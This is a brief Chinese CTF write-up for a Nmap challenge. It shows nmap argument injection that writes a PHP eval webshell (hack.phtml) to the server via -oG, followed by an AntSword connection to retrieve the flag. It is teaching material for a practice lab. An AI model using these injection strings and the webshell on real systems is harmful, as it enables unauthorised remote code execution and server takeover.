命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
帅得不敢出门5 小时前
安卓设备adb执行AT指令控制电话卡
android·adb·sim卡·at指令·电话卡
我又来搬代码了7 小时前
【Android】使用productFlavors构建多个变体
android
德育处主任8 小时前
Mac和安卓手机互传文件(ADB)
android·macos
芦半山8 小时前
Android“引用们”的底层原理
android·java
迃-幵9 小时前
力扣:225 用队列实现栈
android·javascript·leetcode
大风起兮云飞扬丶9 小时前
Android——从相机/相册获取图片
android
Rverdoser9 小时前
Android Studio 多工程公用module引用
android·ide·android studio
aaajj10 小时前
[Android]从FLAG_SECURE禁止截屏看surface
android
@OuYang10 小时前
android10 蓝牙(二)配对源码解析
android
Liknana10 小时前
Android 网易游戏面经
android·面试